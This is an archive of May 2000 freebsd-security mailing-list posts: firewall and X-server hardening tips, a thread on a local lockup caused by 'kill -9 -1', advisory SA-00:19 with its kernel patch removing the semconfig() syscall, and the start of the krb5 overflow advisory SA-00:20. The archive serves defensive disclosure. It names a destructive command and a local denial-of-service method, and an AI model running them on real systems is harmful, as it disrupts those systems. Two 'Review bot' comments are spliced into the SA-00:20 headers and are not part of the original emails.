From owner-freebsd-security Fri May 26 1: 1:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from Inter.barmentlo.net (inter.barmentlo.net [195.38.241.249]) by hub.freebsd.org (Postfix) with ESMTP id 8DF0237B5E4; Fri, 26 May 2000 01:01:27 -0700 (PDT) (envelope-from patrick@barmentlo.net) Received: from mail.barmentlo.net (cable.barmentlo.net [195.38.232.12]) by Inter.barmentlo.net (8.9.3/8.9.2) with ESMTP id KAA27631; Fri, 26 May 2000 10:01:26 +0200 (CEST) Received: from localhost (pbm@localhost) by mail.barmentlo.net (8.10.0/8.9.2) with ESMTP id e4Q81Ql87224; Fri, 26 May 2000 10:01:26 +0200 (CEST) Date: Fri, 26 May 2000 10:01:25 +0200 (CEST)
From: Patrick Barmentlo X-Sender: pbm@anthrax.barmentlo.net To: Ron Smith Cc: freebsd-ipfw@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: sunrpc In-Reply-To: <20000525011936.90760.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hai,

Why not deny all by default and just allow what you want instead? (Must be a lot fewer rules then.. ;-)

patrick

On Wed, 24 May 2000, Ron Smith wrote:
> Hi all,
> 
> I'm running FreeBSD v3.4, and have 'ipfw' in place. I'd like to close
> 'sunrpc' on port 111. I can't seem to find anything specific on how to do
> that at freebsd.org or in "The Complete FreeBSD" or "Building Internet
> Firewalls". 'netstat -na' still shows port 111 listening on both
> 'tcp' and 'udp', even though 'rc.conf' has 'inetd_enable="NO"'. Can anyone
> point me in the right direction?
> 
> TIA
> Ron Smith
> 
> ________________________________________________________________________
> Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com

--
Patrick Barmentlo patrick@barmentlo.nl - pgp key ID 0x8E372335

From owner-freebsd-security Fri May 26 8:46:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id 57B1537BD99 for ; Fri, 26 May 2000 08:46:27 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1) with ESMTP id TAA08439; Fri, 26 May 2000 19:43:54 +0400 (MSD) Date: Fri, 26 May 2000 19:43:57 +0400
From: 3APA3A <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.41) Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Organization: Sandy Info X-Priority: 3 (Normal) Message-ID: <11822.000526@sandy.ru> To: "~jim" Cc: VULN-DEV@SECURITYFOCUS.COM, freebsd-security@FreeBSD.ORG Subject: Re: Local DoS : RedHat 6.0 In-reply-To: <20000523214556.A4977@quebix.dyndns.org> References: <20000523214556.A4977@quebix.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hello ~jim,

The same results occur under FreeBSD 3.2 with XFree86 3.3.3.1 and FreeBSD 4.0 with XFree86 3.3.6, so it seems to be a common X (XFree86?) problem. Since an X server can be launched via a telnet session, it is not necessary to be the console user to crash the console this way.

P.S. No reaction to Ctrl+Alt+Backspace or Ctrl+Alt+Del, no X server, xdm or any other X processes to kill, but the host is alive; you can startx again via telnet to solve the problem.

24.05.00 5:45, you wrote: Local DoS : RedHat 6.0;

~> While killing yet another zombie Netscape process, I made the mistake of
~> typing "kill -9 -1 " as opposed to the normal "kill -9 ." For
~> obvious reasons, this attempted to kill every process owned by my user
~> and hung the entire system in the process. (aka. I couldn't even switch
~> to another console to attempt recovery.) Unfortunately the only way to
~> recover was to "hard boot" the system and run the risk of corrupting my
~> root partition in the process. (Of course with my luck it corrupted.)
~> I actually noticed this "bug" about a year ago, but since forgot about
~> it. From what I've experienced, it definitely happens when a user types
~> "kill -9 -1" while in RedHat 6.0's Gnome/Enlightenment or Afterstep,
~> however I haven't tested any other window managers or versions of Linux.
/3APA3A
http://www.security.nnov.ru

From owner-freebsd-security Fri May 26 9:02:46 2000
Delivered-To: freebsd-security@freebsd.org
Received: from horizon.barak-online.net (horizon.barak.net.il [206.49.94.218]) by hub.freebsd.org (Postfix) with ESMTP id 3A97E37B55E for ; Fri, 26 May 2000 09:02:19 -0700 (PDT) (envelope-from bk532@iname.com)
Received: from localhost.local.net (pop09-1-ras1-p166.barak.net.il [212.150.8.166]) by horizon.barak-online.net (8.9.3/8.9.1) with ESMTP id TAA07570; Fri, 26 May 2000 19:01:17 +0300 (IDT)
Received: from iname.com (localhost.local.net [127.0.0.1]) by localhost.local.net (8.9.3/8.9.3) with ESMTP id LAA40578; Fri, 26 May 2000 11:41:17 +0300 (IDT) (envelope-from bk532@iname.com)
Message-ID: <392E38AC.5A665E69@iname.com>
Date: Fri, 26 May 2000 11:41:16 +0300
From: Boris Karnaukh
Organization: Private person
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 3.4-STABLE i386)
X-Accept-Language: en, ru
MIME-Version: 1.0
To: BD
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Web Server and Xwindows
References:
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

BD wrote:
>
> I've never used or installed IPSEC although I'm aware that is part of
> 4.0(?). Since I will only use X locally is this still necessary? I had
> planned to use ipfw to block X at the interface. I am completely ignorant
> when it comes to securing X (that's why I've never used it before).
>

You can simply run the X server with the -nolisten tcp option. For example:

startx -- -nolisten tcp

All your X servers will then use unix sockets for communication, not tcp.

--
Boris Karnaukh (mailto:bk532@iname.com)

From owner-freebsd-security Fri May 26 10:33:04 2000
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 4DB1C37BE94; Fri, 26 May 2000 10:32:23 -0700 (PDT)
From: FreeBSD Security Officer
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:19.semconfig
Reply-To: security-officer@freebsd.org
From: FreeBSD Security Officer
Message-Id: <20000526173223.4DB1C37BE94@hub.freebsd.org>
Date: Fri, 26 May 2000 10:32:23 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

=============================================================================
FreeBSD-SA-00:19                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          local users can prevent all processes from exiting
Category:       core
Module:         kernel
Announced:      2000-05-26
Credits:        Peter Wemm
Affects:        386BSD-derived OSes, including all versions of FreeBSD, NetBSD and OpenBSD.
Corrected:      2000-05-01
FreeBSD only:   NO
Patch:          ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:19/semconfig.patch

I.   Background

System V IPC is a set of interfaces for providing inter-process communication, in the form of shared memory segments, message queues and semaphores. These are managed in user-space by ipcs(1) and related utilities.

II.  Problem Description

An undocumented system call is incorrectly exported from the kernel without access-control checks. Issuing it acquires a global semaphore-facility lock in the kernel that makes every process on the system block during exit() handling, so no process can exit until the corresponding "unblock" system call is issued. This operation was intended for use only by ipcs(1), to atomically sample the state of System V IPC resources on the system (i.e. to ensure that resources are not allocated or deallocated while the sampling itself is in progress). In the future, this functionality may be reimplemented as a sysctl() node.

III. Impact

An unprivileged local user can cause every process on the system to hang during exit. In other words, once the system call has been issued, no process on the system can exit completely until another user issues the "unblock" call or the system is rebooted. This is a denial-of-service attack.

IV.  Workaround

None available.

V.
Solution

Upgrade to FreeBSD 2.1.7.1-STABLE, 2.2.8-STABLE, 3.4-STABLE, 4.0-STABLE or 5.0-CURRENT after the correction date.

Alternatively, apply the following patch and rebuild the kernel and the src/usr.bin/ipcs utility. This patch removes the semconfig() syscall. It has been tested to apply cleanly against 3.4-RELEASE, 3.4-STABLE, 4.0-RELEASE and 4.0-STABLE systems.

1) Save this advisory as a file, and run the following commands as root:

# cd /usr/src
# patch -p < /path/to/advisory
# cd usr.bin/ipcs
# make all install

2) Rebuild and reinstall the kernel and kernel modules as described in the FreeBSD handbook (see: http://www.freebsd.org/handbook/kernelconfig.html for more information)

3) Reboot the system

Patches for FreeBSD systems before the resolution date:

--- sys/kern/syscalls.master 2000/01/19 06:01:07 1.72 +++ sys/kern/syscalls.master 2000/05/01 11:15:10 1.72.2.1 @@ -342,7 +342,7 @@ 221 STD BSD { int semget(key_t key, int nsems, int semflg); } 222 STD BSD { int semop(int semid, struct sembuf *sops, \ u_int nsops); } -223 STD BSD { int semconfig(int flag); } +223 UNIMPL NOHIDE semconfig 224 STD BSD { int msgctl(int msqid, int cmd, \ struct msqid_ds *buf); } 225 STD BSD { int msgget(key_t key, int msgflg); } --- sys/kern/init_sysent.c 2000/01/19 06:02:29 1.79 +++ sys/kern/init_sysent.c 2000/05/01 11:15:56 1.79.2.1 @@ -243,7 +243,7 @@ { 4, (sy_call_t *)__semctl }, /* 220 = __semctl */ { 3, (sy_call_t *)semget }, /* 221 = semget */ { 3, (sy_call_t *)semop }, /* 222 = semop */ - { 1, (sy_call_t *)semconfig }, /* 223 = semconfig */ + { 0, (sy_call_t *)nosys }, /* 223 = semconfig */ { 3, (sy_call_t *)msgctl }, /* 224 = msgctl */ { 2, (sy_call_t *)msgget }, /* 225 = msgget */ { 4, (sy_call_t *)msgsnd }, /* 226 = msgsnd */ --- sys/kern/syscalls.c 2000/01/19 06:02:29 1.71 +++ sys/kern/syscalls.c 2000/05/01 11:15:56 1.71.2.1 
@@ -230,7 +230,7 @@ "__semctl", /* 220 = __semctl */ "semget", /* 221 = semget */ "semop", /* 222 = semop */ - "semconfig", /* 223 = semconfig */ + "#223", /* 223 = semconfig */ "msgctl", /* 224 = msgctl */ "msgget", /* 225 = msgget */ "msgsnd", /* 226 = msgsnd */ --- sys/kern/sysv_ipc.c 2000/02/29 22:58:59 1.13 +++ sys/kern/sysv_ipc.c 2000/05/01 11:15:56 1.13.2.1 @@ -107,15 +107,6 @@ semsys(p, uap) struct proc *p; struct semsys_args *uap; -{ - sysv_nosys(p, "SYSVSEM"); - return nosys(p, (struct nosys_args *)uap); -}; - -int -semconfig(p, uap) - struct proc *p; - struct semconfig_args *uap; { sysv_nosys(p, "SYSVSEM"); return nosys(p, (struct nosys_args *)uap); --- sys/kern/sysv_sem.c 2000/04/02 08:47:08 1.24.2.1 +++ sys/kern/sysv_sem.c 2000/05/01 11:15:56 1.24.2.2 @@ -26,8 +26,6 @@ int semget __P((struct proc *p, struct semget_args *uap)); struct semop_args; int semop __P((struct proc *p, struct semop_args *uap)); -struct semconfig_args; -int semconfig __P((struct proc *p, struct semconfig_args *uap)); #endif static struct sem_undo *semu_alloc __P((struct proc *p)); @@ -38,7 +36,7 @@ /* XXX casting to (sy_call_t *) is bogus, as usual. */ static sy_call_t *semcalls[] = { (sy_call_t *)__semctl, (sy_call_t *)semget, - (sy_call_t *)semop, (sy_call_t *)semconfig + (sy_call_t *)semop }; static int semtot = 0; @@ -47,8 +45,6 @@ static struct sem_undo *semu_list; /* list of active undo structures */ int *semu; /* undo structure pool */ -static struct proc *semlock_holder = NULL; - void seminit(dummy) void *dummy; 
@@ -87,64 +83,12 @@ } */ *uap; { - while (semlock_holder != NULL && semlock_holder != p) - (void) tsleep((caddr_t)&semlock_holder, (PZERO - 4), "semsys", 0); - if (uap->which >= sizeof(semcalls)/sizeof(semcalls[0])) return (EINVAL); return ((*semcalls[uap->which])(p, &uap->a2)); } /* - * Lock or unlock the entire semaphore facility. - * - * This will probably eventually evolve into a general purpose semaphore - * facility status enquiry mechanism (I don't like the "read /dev/kmem" - * approach currently taken by ipcs and the amount of info that we want - * to be able to extract for ipcs is probably beyond what the capability - * of the getkerninfo facility. - * - * At the time that the current version of semconfig was written, ipcs is - * the only user of the semconfig facility. It uses it to ensure that the - * semaphore facility data structures remain static while it fishes around - * in /dev/kmem. - */ - -#ifndef _SYS_SYSPROTO_H_ -struct semconfig_args { - semconfig_ctl_t flag; -}; -#endif - -int -semconfig(p, uap) - struct proc *p; - struct semconfig_args *uap; -{ - int eval = 0; - - switch (uap->flag) { - case SEM_CONFIG_FREEZE: - semlock_holder = p; - break; - - case SEM_CONFIG_THAW: - semlock_holder = NULL; - wakeup((caddr_t)&semlock_holder); - break; - - default: - printf("semconfig: unknown flag parameter value (%d) - ignored\n", - uap->flag); - eval = EINVAL; - break; - } - - p->p_retval[0] = 0; - return(eval); -} - -/* * Allocate a new sem_undo structure for a process * (returns ptr to structure or NULL if no more room) */ @@ -873,17 +817,6 @@ register struct sem_undo **supptr; int did_something; - /* - * If somebody else is holding the global semaphore facility lock - * then sleep until it is released. - */ - while (semlock_holder != NULL && semlock_holder != p) { -#ifdef SEM_DEBUG - printf("semaphore facility locked - sleeping ...\n"); -#endif - (void) tsleep((caddr_t)&semlock_holder, (PZERO - 4), "semext", 0); - } - did_something = 0; /* 
@@ -898,7 +831,7 @@ } if (suptr == NULL) - goto unlock; + return; #ifdef SEM_DEBUG printf("proc @%08x has undo structure with %d entries\n", p, @@ -955,14 +888,4 @@ #endif suptr->un_proc = NULL; *supptr = suptr->un_next; - -unlock: - /* - * If the exiting process is holding the global semaphore facility - * lock then release it. - */ - if (semlock_holder == p) { - semlock_holder = NULL; - wakeup((caddr_t)&semlock_holder); - } } --- sys/sys/sem.h 1999/12/29 04:24:46 1.20 +++ sys/sys/sem.h 2000/05/01 11:15:58 1.20.2.1 @@ -163,13 +163,5 @@ * Process sem_undo vectors at proc exit. */ void semexit __P((struct proc *p)); - -/* - * Parameters to the semconfig system call - */ -typedef enum { - SEM_CONFIG_FREEZE, /* Freeze the semaphore facility. */ - SEM_CONFIG_THAW /* Thaw the semaphore facility. */ -} semconfig_ctl_t; #endif /* _KERNEL */ --- sys/sys/syscall-hide.h 2000/01/19 06:02:31 1.65 +++ sys/sys/syscall-hide.h 2000/05/01 11:15:58 1.65.2.1 @@ -191,7 +191,6 @@ HIDE_BSD(__semctl) HIDE_BSD(semget) HIDE_BSD(semop) -HIDE_BSD(semconfig) HIDE_BSD(msgctl) HIDE_BSD(msgget) HIDE_BSD(msgsnd) --- sys/sys/syscall.h 2000/01/19 06:02:31 1.69 +++ sys/sys/syscall.h 2000/05/01 11:15:59 1.69.2.1 @@ -196,7 +196,6 @@ #define SYS___semctl 220 #define SYS_semget 221 #define SYS_semop 222 -#define SYS_semconfig 223 #define SYS_msgctl 224 #define SYS_msgget 225 #define SYS_msgsnd 226 --- sys/sys/syscall.mk 2000/01/19 06:07:34 1.23 +++ sys/sys/syscall.mk 2000/05/01 11:15:59 1.23.2.1 @@ -148,7 +148,6 @@ __semctl.o \ semget.o \ semop.o \ - semconfig.o \ msgctl.o \ msgget.o \ msgsnd.o \ --- sys/sys/sysproto.h 2000/01/19 06:02:31 1.59 +++ sys/sys/sysproto.h 2000/05/01 11:16:00 1.59.2.1 @@ -662,9 +662,6 @@ struct sembuf * sops; char sops_[PAD_(struct sembuf *)]; u_int nsops; char nsops_[PAD_(u_int)]; }; -struct semconfig_args { - int flag; char flag_[PAD_(int)]; -}; struct msgctl_args { int msqid; char msqid_[PAD_(int)]; int cmd; char cmd_[PAD_(int)]; 
@@ -1158,7 +1155,6 @@ int __semctl __P((struct proc *, struct __semctl_args *)); int semget __P((struct proc *, struct semget_args *)); int semop __P((struct proc *, struct semop_args *)); -int semconfig __P((struct proc *, struct semconfig_args *)); int msgctl __P((struct proc *, struct msgctl_args *)); int msgget __P((struct proc *, struct msgget_args *)); int msgsnd __P((struct proc *, struct msgsnd_args *)); --- usr.bin/ipcs/ipcs.c 1999/12/29 05:05:32 1.12 +++ usr.bin/ipcs/ipcs.c 2000/05/01 10:51:37 1.12.2.1 @@ -56,7 +56,6 @@ struct shminfo shminfo; struct shmid_ds *shmsegs; -int semconfig __P((int,...)); void usage __P((void)); static struct nlist symbols[] = { @@ -420,11 +419,6 @@ seminfo.semaem); } if (display & SEMINFO) { - if (semconfig(SEM_CONFIG_FREEZE) != 0) { - perror("semconfig"); - fprintf(stderr, - "Can't lock semaphore facility - winging it...\n"); - } kvm_read(kd, symbols[X_SEMA].n_value, &sema, sizeof(sema)); xsema = malloc(sizeof(struct semid_ds) * seminfo.semmni); kvm_read(kd, (u_long) sema, xsema, sizeof(struct semid_ds) * seminfo.semmni); @@ -470,8 +464,6 @@ printf("\n"); } } - - (void) semconfig(SEM_CONFIG_THAW); printf("\n"); }

From owner-freebsd-security Fri May 26 10:40:51 2000
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id 514AE37BF77; Fri, 26 May 2000 10:40:39 -0700 (PDT)
From: FreeBSD Security Officer
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:20.krb5
Reply-To: security-officer@freebsd.org
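Review bot: in the SA-00:19 patch, the sys/kern/sysv_sem.c hunk at @@ -87,64 +83,12 @@ deletes semconfig() together with the `while (semlock_holder != NULL && semlock_holder != p)` wait in semsys(), which was the only thing keeping the semaphore tables static while, as the deleted comment puts it, ipcs "fishes around in /dev/kmem"; the usr.bin/ipcs/ipcs.c hunks accept the resulting race by simply dropping the SEM_CONFIG_FREEZE/THAW calls around the two kvm_read() calls, so a one-line comment there noting that the sema/xsema snapshot is no longer atomic would record the trade-off the advisory's "may be reimplemented as a sysctl() node" remark alludes to. The `uap->which >= sizeof(semcalls)/sizeof(semcalls[0])` check left in semsys() is derived from the table, so shrinking semcalls[] to three entries in the @@ -38,7 +36,7 @@ hunk needs no matching change.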
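Review bot: in the same patch, the sys/sys/syscall.mk hunk drops semconfig.o from the libc stub list and the syscall.h hunk drops SYS_semconfig, while syscalls.master keeps the slot as `223 UNIMPL NOHIDE semconfig` and init_sysent.c points it at nosys; the net effect is that nothing new can be linked against semconfig(), the syscall numbers after 223 do not shift, and an old ipcs binary run on a patched kernel only takes its existing `if (semconfig(SEM_CONFIG_FREEZE) != 0)` path, prints "Can't lock semaphore facility - winging it..." and continues. A sentence in the advisory saying that this warning is expected from a stale ipcs would help anyone who rebuilds the kernel in step 2) without first doing the usr.bin/ipcs rebuild in step 1).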
From: FreeBSD Security Officer
Message-Id: <20000526174039.514AE37BF77@hub.freebsd.org>
Date: Fri, 26 May 2000 10:40:39 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

=============================================================================
FreeBSD-SA-00:20                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          krb5 port contains remote and local root exploits.
Category:       ports
Module:         krb5
Announced:      2000-05-26
Credits:        Jeffrey I. Schiller
Affects:        Ports collection prior to the correction date
Corrected:      2000-05-17
Vendor status:  Patch released
FreeBSD only:   NO

I.   Background

MIT Kerberos 5 is an implementation of the Kerberos 5 protocol which is available in the FreeBSD ports collection as the security/krb5 port. FreeBSD also includes separately-developed Kerberos 4 and 5 implementations from KTH, which are optionally installed as part of the base system (KTH Heimdal, the Kerberos 5 implementation, is currently considered "experimental" software).

II.  Problem Description

The MIT Kerberos 5 port, versions 1.1.1 and earlier, contains several remote and local buffer overflows which can lead to root compromise. Note that the Kerberos implementations shipped in the FreeBSD base system are developed separately from MIT Kerberos and are believed not to be vulnerable to these problems. However, a very old release of FreeBSD dating from 1997 (FreeBSD 2.2.5) did ship with a closely MIT-derived Kerberos implementation ("eBones") and may be vulnerable to attacks of the kind described here. Any users still running FreeBSD 2.2.5 who have installed the optional Kerberos distribution are urged to upgrade to 2.2.8-STABLE or later. Note, however, that FreeBSD 2.x is no longer an officially supported version, nor are security fixes always provided for it.
The krb5 port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains nearly 3300 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.0 contains this problem, since it was discovered after the release. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports.

III. Impact

Local or remote users can obtain root access on a system running krb5. If you have not chosen to install the krb5 port, your system is not vulnerable to this problem.

IV.  Workaround

Due to the nature of the vulnerability, several programs and network services are affected. If recompiling the port is not practical, please see the MIT Kerberos advisory for suggested workarounds (including the disabling or adjustment of services and removal of setuid permissions on vulnerable binaries). The advisory can be found at the following location:

http://web.mit.edu/kerberos/www/advisories/krb4buf.txt

V.   Solution

1) Upgrade your entire ports collection and rebuild the krb5 port. A package is not provided for this port for export control reasons.

2) Download a new port skeleton for the krb5 port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

3) Use the portcheckout utility to automate option (3) above.
The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from:

ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz